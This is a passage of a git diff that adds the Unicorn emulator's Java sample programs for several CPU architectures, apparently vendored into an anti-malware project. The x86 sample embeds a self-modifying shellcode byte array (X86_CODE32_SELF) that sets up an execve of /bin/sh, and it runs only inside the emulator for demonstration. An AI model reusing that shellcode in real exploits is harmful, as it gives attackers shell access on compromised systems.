Unicorn.UC_MODE_THUMB); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, THUMB_CODE); + + // initialize machine registers + u.reg_write(Unicorn.UC_ARM_REG_SP, sp); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + sp = (Long)u.reg_read(Unicorn.UC_ARM_REG_SP); + System.out.print(String.format(">>> SP = 0x%x\n", sp.intValue())); + + u.close(); + } + + public static void main(String args[]) + { + test_arm(); + System.out.print("==========================\n"); + test_thumb(); + } + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm64.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm64.java new file mode 100644 index 0000000..56a7212 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_arm64.java @@ -0,0 +1,115 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +/* Sample code to demonstrate how to emulate ARM64 code */ + +import unicorn.*; + +public class Sample_arm64 { + + // code to be emulated + public static final byte[] ARM_CODE = {-85,1,15,-117}; // add x11, x13, x15 + + // memory address where emulation starts + public static final int ADDRESS = 0x10000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + // callback for tracing basic blocks + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size)); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + } + } + + static void test_arm64() + { + + Long x11 = new Long(0x1234); // X11 register + Long x13 = new Long(0x6789); // X13 register + Long x15 = new Long(0x3333); // X15 register + + System.out.print("Emulate ARM64 code\n"); + + // Initialize emulator in ARM mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_ARM64, Unicorn.UC_MODE_ARM); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, ARM_CODE); + + // initialize machine registers + u.reg_write(Unicorn.UC_ARM64_REG_X11, x11); + u.reg_write(Unicorn.UC_ARM64_REG_X13, x13); + u.reg_write(Unicorn.UC_ARM64_REG_X15, x15); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + ARM_CODE.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + x11 = (Long)u.reg_read(Unicorn.UC_ARM64_REG_X11); + System.out.print(String.format(">>> X11 = 0x%x\n", x11.longValue())); + + u.close(); + } + + public static void main(String args[]) + { + test_arm64(); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_m68k.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_m68k.java new file mode 100644 index 0000000..cae025a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_m68k.java @@ -0,0 +1,177 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +/* Unicorn Emulator Engine */ +/* By Loi Anh Tuan, 2015 */ + +/* Sample code to demonstrate how to emulate m68k code */ + +import unicorn.*; + +public class Sample_m68k { + + // code to be emulated + public static final byte[] M68K_CODE = {118,-19}; // movq #-19, %d3 + + // memory address where emulation starts + public static final int ADDRESS = 0x10000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + // callback for tracing basic blocks + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size)); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + } + } + + static void test_m68k() + { + Long d0 = new Long(0x0000); // d0 data register + Long d1 = new Long(0x0000); // d1 data register + Long d2 = new Long(0x0000); // d2 data register + Long d3 = new Long(0x0000); // d3 data register + Long d4 = new Long(0x0000); // d4 data register + Long d5 = new Long(0x0000); // d5 data register + Long d6 = new Long(0x0000); // d6 data register + Long d7 = new Long(0x0000); // d7 data register + + Long a0 = new Long(0x0000); // a0 address register + Long a1 = new Long(0x0000); // a1 address register + Long a2 = new Long(0x0000); // a2 address register + Long a3 = new Long(0x0000); // a3 address register + Long a4 = new Long(0x0000); // a4 address register + Long a5 = new Long(0x0000); // a5 address register + Long a6 = new Long(0x0000); // a6 address register + Long a7 = new Long(0x0000); // a6 address register + + Long pc = new Long(0x0000); // program counter + Long sr = new Long(0x0000); // status register + + System.out.print("Emulate M68K code\n"); + + // Initialize emulator in M68K mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_M68K, Unicorn.UC_MODE_BIG_ENDIAN); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, M68K_CODE); + + // initialize machine registers + u.reg_write(Unicorn.UC_M68K_REG_D0, d0); + u.reg_write(Unicorn.UC_M68K_REG_D1, d1); + u.reg_write(Unicorn.UC_M68K_REG_D2, d2); + u.reg_write(Unicorn.UC_M68K_REG_D3, d3); + u.reg_write(Unicorn.UC_M68K_REG_D4, d4); + u.reg_write(Unicorn.UC_M68K_REG_D5, d5); + u.reg_write(Unicorn.UC_M68K_REG_D6, d6); + u.reg_write(Unicorn.UC_M68K_REG_D7, d7); + + u.reg_write(Unicorn.UC_M68K_REG_A0, a0); + u.reg_write(Unicorn.UC_M68K_REG_A1, a1); + u.reg_write(Unicorn.UC_M68K_REG_A2, a2); + u.reg_write(Unicorn.UC_M68K_REG_A3, a3); + u.reg_write(Unicorn.UC_M68K_REG_A4, a4); + u.reg_write(Unicorn.UC_M68K_REG_A5, a5); + u.reg_write(Unicorn.UC_M68K_REG_A6, a6); + u.reg_write(Unicorn.UC_M68K_REG_A7, a7); + + u.reg_write(Unicorn.UC_M68K_REG_PC, pc); + u.reg_write(Unicorn.UC_M68K_REG_SR, sr); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instruction + u.hook_add(new MyCodeHook(), 1, 0, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + M68K_CODE.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + d0 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D0); + d1 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D1); + d2 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D2); + d3 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D3); + d4 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D4); + d5 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D5); + d6 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D6); + d7 = (Long)u.reg_read(Unicorn.UC_M68K_REG_D7); + + a0 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A0); + a1 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A1); + a2 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A2); + a3 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A3); + a4 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A4); + a5 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A5); + a6 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A6); + a7 = (Long)u.reg_read(Unicorn.UC_M68K_REG_A7); + + pc = (Long)u.reg_read(Unicorn.UC_M68K_REG_PC); + sr = (Long)u.reg_read(Unicorn.UC_M68K_REG_SR); + + System.out.print(String.format(">>> A0 = 0x%x\t\t>>> D0 = 0x%x\n", a0.intValue(), d0.intValue())); + System.out.print(String.format(">>> A1 = 0x%x\t\t>>> D1 = 0x%x\n", a1.intValue(), d1.intValue())); + System.out.print(String.format(">>> A2 = 0x%x\t\t>>> D2 = 0x%x\n", a2.intValue(), d2.intValue())); + System.out.print(String.format(">>> A3 = 0x%x\t\t>>> D3 = 0x%x\n", a3.intValue(), d3.intValue())); + System.out.print(String.format(">>> A4 = 0x%x\t\t>>> D4 = 0x%x\n", a4.intValue(), d4.intValue())); + System.out.print(String.format(">>> A5 = 0x%x\t\t>>> D5 = 0x%x\n", a5.intValue(), d5.intValue())); + System.out.print(String.format(">>> A6 = 0x%x\t\t>>> D6 = 0x%x\n", a6.intValue(), d6.intValue())); + System.out.print(String.format(">>> A7 = 0x%x\t\t>>> D7 = 0x%x\n", a7.intValue(), d7.intValue())); + System.out.print(String.format(">>> PC = 0x%x\n", pc.intValue())); + System.out.print(String.format(">>> SR = 0x%x\n", sr.intValue())); + + u.close(); + } + + public static void main(String args[]) + { + test_m68k(); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_mips.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_mips.java new file mode 100644 index 0000000..d977c23 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_mips.java @@ -0,0 +1,151 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +/* Sample code to demonstrate how to emulate Mips code (big endian) */ + +import unicorn.*; + +public class Sample_mips { + + // code to be emulated + public static final byte[] MIPS_CODE_EB = {52,33,52,86}; + public static final byte[] MIPS_CODE_EL = {86,52,33,52}; + + // memory address where emulation starts + public static final int ADDRESS = 0x10000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + // callback for tracing basic blocks + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size)); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + } + } + + static void test_mips_eb() + { + + Long r1 = new Long(0x6789); // R1 register + + System.out.print("Emulate MIPS code (big-endian)\n"); + + // Initialize emulator in MIPS mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_MIPS32 + Unicorn.UC_MODE_BIG_ENDIAN); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, MIPS_CODE_EB); + + // initialize machine registers + u.reg_write(Unicorn.UC_MIPS_REG_1, r1); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EB.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r1 = (Long)u.reg_read(Unicorn.UC_MIPS_REG_1); + System.out.print(String.format(">>> R1 = 0x%x\n", r1.intValue())); + + u.close(); + } + + static void test_mips_el() + { + Long r1 = new Long(0x6789); // R1 register + + System.out.print("===========================\n"); + System.out.print("Emulate MIPS code (little-endian)\n"); + + // Initialize emulator in MIPS mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_MIPS, Unicorn.UC_MODE_MIPS32 + Unicorn.UC_MODE_LITTLE_ENDIAN); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, MIPS_CODE_EL); + + // initialize machine registers + u.reg_write(Unicorn.UC_MIPS_REG_1, r1); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EL.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r1 = (Long)u.reg_read(Unicorn.UC_MIPS_REG_1); + System.out.print(String.format(">>> R1 = 0x%x\n", r1.intValue())); + + u.close(); + } + + public static void main(String args[]) + { + test_mips_eb(); + test_mips_el(); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_sparc.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_sparc.java new file mode 100644 index 0000000..85d2636 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_sparc.java @@ -0,0 +1,115 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +/* Sample code to demonstrate how to emulate Sparc code */ + +import unicorn.*; + +public class Sample_sparc { + + // code to be emulated + public static final byte[] SPARC_CODE = {-122,0,64,2}; + //public static final byte[] SPARC_CODE = {-69,112,0,0}; //illegal code + + // memory address where emulation starts + public static final int ADDRESS = 0x10000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + // callback for tracing basic blocks + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size)); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.print(String.format(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size)); + } + } + + static void test_sparc() + { + Long g1 = new Long(0x1230); // G1 register + Long g2 = new Long(0x6789); // G2 register + Long g3 = new Long(0x5555); // G3 register + + System.out.print("Emulate SPARC code\n"); + + // Initialize emulator in Sparc mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_SPARC, Unicorn.UC_MODE_32 + Unicorn.UC_MODE_BIG_ENDIAN); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, SPARC_CODE); + + // initialize machine registers + u.reg_write(Unicorn.UC_SPARC_REG_G1, g1); + u.reg_write(Unicorn.UC_SPARC_REG_G2, g2); + u.reg_write(Unicorn.UC_SPARC_REG_G3, g3); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing one instruction at ADDRESS with customized callback + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time (last param = 0), or when + // finishing all the code. + u.emu_start(ADDRESS, ADDRESS + SPARC_CODE.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + g3 = (Long)u.reg_read(Unicorn.UC_SPARC_REG_G3); + System.out.print(String.format(">>> G3 = 0x%x\n", g3.intValue())); + + u.close(); + } + + public static void main(String args[]) + { + test_sparc(); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86.java new file mode 100644 index 0000000..e25df64 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/Sample_x86.java @@ -0,0 +1,669 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ + +/* Sample code to demonstrate how to emulate X86 code */ + +import unicorn.*; + +public class Sample_x86 { + + // code to be emulated + public static final byte[] X86_CODE32 = {65,74}; + public static final byte[] X86_CODE32_JUMP = {-21,2,-112,-112,-112,-112,-112,-112}; + public static final byte[] X86_CODE32_SELF = {-21,28,90,-119,-42,-117,2,102,61,-54,125,117,6,102,5,3,3,-119,2,-2,-62,61,65,65,65,65,117,-23,-1,-26,-24,-33,-1,-1,-1,49,-46,106,11,88,-103,82,104,47,47,115,104,104,47,98,105,110,-119,-29,82,83,-119,-31,-54,125,65,65,65,65}; + public static final byte[] X86_CODE32_LOOP = {65,74,-21,-2}; + public static final byte[] X86_CODE32_MEM_WRITE = {-119,13,-86,-86,-86,-86,65,74}; + public static final byte[] X86_CODE32_MEM_READ = {-117,13,-86,-86,-86,-86,65,74}; + public static final byte[] X86_CODE32_JMP_INVALID = {-23,-23,-18,-18,-18,65,74}; + public static final byte[] X86_CODE32_INOUT = {65,-28,63,74,-26,70,67}; + public static final byte[] X86_CODE64 = {65,-68,59,-80,40,42,73,15,-55,-112,77,15,-83,-49,73,-121,-3,-112,72,-127,-46,-118,-50,119,53,72,-9,-39,77,41,-12,73,-127,-55,-10,-118,-58,83,77,-121,-19,72,15,-83,-46,73,-9,-44,72,-9,-31,77,25,-59,77,-119,-59,72,-9,-42,65,-72,79,-115,107,89,77,-121,-48,104,106,30,9,60,89}; + public static final byte[] X86_CODE16 = {0, 0}; // add byte ptr [bx + si], al + + // memory address where emulation starts + public static final int ADDRESS = 0x1000000; + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + // callback for tracing basic blocks + // callback for tracing instruction + private static class MyBlockHook implements BlockHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.printf(">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); + } + } + + // callback for tracing instruction + private static class MyCodeHook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + System.out.printf(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); + + Long eflags = (Long)u.reg_read(Unicorn.UC_X86_REG_EFLAGS); + System.out.printf(">>> --- EFLAGS is 0x%x\n", eflags.intValue()); + + // Uncomment below code to stop the emulation using uc_emu_stop() + // if (address == 0x1000009) + // u.emu_stop(); + } + } + + private static class MyWriteInvalidHook implements EventMemHook { + public boolean hook(Unicorn u, long address, int size, long value, Object user) { + System.out.printf(">>> Missing memory is being WRITE at 0x%x, data size = %d, data value = 0x%x\n", + address, size, value); + // map this memory in with 2MB in size + u.mem_map(0xaaaa0000, 2 * 1024*1024, Unicorn.UC_PROT_ALL); + // return true to indicate we want to continue + return true; + } + } + + // callback for tracing instruction + private static class MyCode64Hook implements CodeHook { + public void hook(Unicorn u, long address, int size, Object user_data) { + Long r_rip = (Long)u.reg_read(Unicorn.UC_X86_REG_RIP); + System.out.printf(">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); + System.out.printf(">>> RIP is 0x%x\n", r_rip.longValue()); + + // Uncomment below code to stop the emulation using uc_emu_stop() + // if (address == 0x1000009) + // uc_emu_stop(handle); + } + } + + + private static class MyRead64Hook implements ReadHook { + public void hook(Unicorn u, long address, int size, Object user) { + System.out.printf(">>> Memory is being READ at 0x%x, data size = %d\n", address, size); + } + } + + private static class MyWrite64Hook implements WriteHook { + public void hook(Unicorn u, long address, int size, long value, Object user) { + System.out.printf(">>> Memory is being WRITE at 0x%x, data size = %d, data value = 0x%x\n", + address, size, value); + } + } + + // callback for IN instruction (X86). + // this returns the data read from the port + private static class MyInHook implements InHook { + public int hook(Unicorn u, int port, int size, Object user_data) { + Long r_eip = (Long)u.reg_read(Unicorn.UC_X86_REG_EIP); + + System.out.printf("--- reading from port 0x%x, size: %d, address: 0x%x\n", port, size, r_eip.intValue()); + + switch(size) { + case 1: + // read 1 byte to AL + return 0xf1; + case 2: + // read 2 byte to AX + return 0xf2; + case 4: + // read 4 byte to EAX + return 0xf4; + } + return 0; + } + } + + // callback for OUT instruction (X86). + private static class MyOutHook implements OutHook { + public void hook(Unicorn u, int port, int size, int value, Object user) { + Long eip = (Long)u.reg_read(Unicorn.UC_X86_REG_EIP); + Long tmp = null; + System.out.printf("--- writing to port 0x%x, size: %d, value: 0x%x, address: 0x%x\n", port, size, value, eip.intValue()); + + // confirm that value is indeed the value of AL/AX/EAX + switch(size) { + default: + return; // should never reach this + case 1: + tmp = (Long)u.reg_read(Unicorn.UC_X86_REG_AL); + break; + case 2: + tmp = (Long)u.reg_read(Unicorn.UC_X86_REG_AX); + break; + case 4: + tmp = (Long)u.reg_read(Unicorn.UC_X86_REG_EAX); + break; + } + + System.out.printf("--- register value = 0x%x\n", tmp.intValue()); + } + } + + static void test_i386() { + Long r_ecx = new Long(0x1234); // ECX register + Long r_edx = new Long(0x7890); // EDX register + + System.out.print("Emulate i386 code\n"); + + // Initialize emulator in X86-32bit mode + Unicorn uc; + try { + uc = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + } catch (UnicornException uex) { + System.out.println("Failed on uc_open() with error returned: " + uex); + return; + } + + // map 2MB memory for this emulation + uc.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + try { + uc.mem_write(ADDRESS, X86_CODE32); + } catch (UnicornException uex) { + System.out.println("Failed to write emulation code to memory, quit!\n"); + return; + } + + // initialize machine registers + uc.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + uc.reg_write(Unicorn.UC_X86_REG_EDX, r_edx); + + // tracing all basic blocks with customized callback + uc.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instruction by having @begin > @end + uc.hook_add(new MyCodeHook(), 1, 0, null); + + // emulate machine code in infinite time + try { + uc.emu_start(ADDRESS, ADDRESS + X86_CODE32.length, 0, 0); + } catch (UnicornException uex) { + System.out.printf("Failed on uc_emu_start() with error : %s\n", + uex.getMessage()); + } + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r_ecx = (Long)uc.reg_read(Unicorn.UC_X86_REG_ECX); + r_edx = (Long)uc.reg_read(Unicorn.UC_X86_REG_EDX); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + System.out.printf(">>> EDX = 0x%x\n", r_edx.intValue()); + + // read from memory + try { + byte[] tmp = uc.mem_read(ADDRESS, 4); + System.out.printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", ADDRESS, toInt(tmp)); + } catch (UnicornException ex) { + System.out.printf(">>> Failed to read 4 bytes from [0x%x]\n", ADDRESS); + } + uc.close(); + } + + static void test_i386_inout() + { + Long r_eax = new Long(0x1234); // ECX register + Long r_ecx = new Long(0x6789); // EDX register + + System.out.print("===================================\n"); + System.out.print("Emulate i386 code with IN/OUT instructions\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_INOUT); + + // initialize machine registers + u.reg_write(Unicorn.UC_X86_REG_EAX, r_eax); + u.reg_write(Unicorn.UC_X86_REG_ECX, r_ecx); + + // tracing all basic blocks with customized callback + u.hook_add(new MyBlockHook(), 1, 0, null); + + // tracing all instructions + u.hook_add(new MyCodeHook(), 1, 0, null); + + // handle IN instruction + u.hook_add(new MyInHook(), null); + // handle OUT instruction + u.hook_add(new MyOutHook(), null); + + // emulate machine code in infinite time + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_INOUT.length, 0, 0); + + // now print out some registers + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + r_eax = (Long)u.reg_read(Unicorn.UC_X86_REG_EAX); + r_ecx = (Long)u.reg_read(Unicorn.UC_X86_REG_ECX); + System.out.printf(">>> EAX = 0x%x\n", r_eax.intValue()); + System.out.printf(">>> ECX = 0x%x\n", r_ecx.intValue()); + + u.close(); + } + + static void test_i386_jump() + { + System.out.print("===================================\n"); + System.out.print("Emulate i386 code with jump\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to memory + u.mem_write(ADDRESS, X86_CODE32_JUMP); + + // tracing 1 basic block with customized callback + u.hook_add(new MyBlockHook(), ADDRESS, ADDRESS, null); + + // tracing 1 instruction at ADDRESS + u.hook_add(new MyCodeHook(), ADDRESS, ADDRESS, null); + + // emulate machine code in infinite time + u.emu_start(ADDRESS, ADDRESS + X86_CODE32_JUMP.length, 0, 0); + + System.out.print(">>> Emulation done. Below is the CPU context\n"); + + u.close(); + } + + // emulate code that loop forever + static void test_i386_loop() + { + Long r_ecx = new Long(0x1234); // ECX register + Long r_edx = new Long(0x7890); // EDX register + + System.out.print("===================================\n"); + System.out.print("Emulate i386 code that loop forever\n"); + + // Initialize emulator in X86-32bit mode + Unicorn u = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32); + + // map 2MB memory for this emulation + u.mem_map(ADDRESS, 2 * 1024 * 1024, Unicorn.UC_PROT_ALL); + + // write machine code to be emulated to 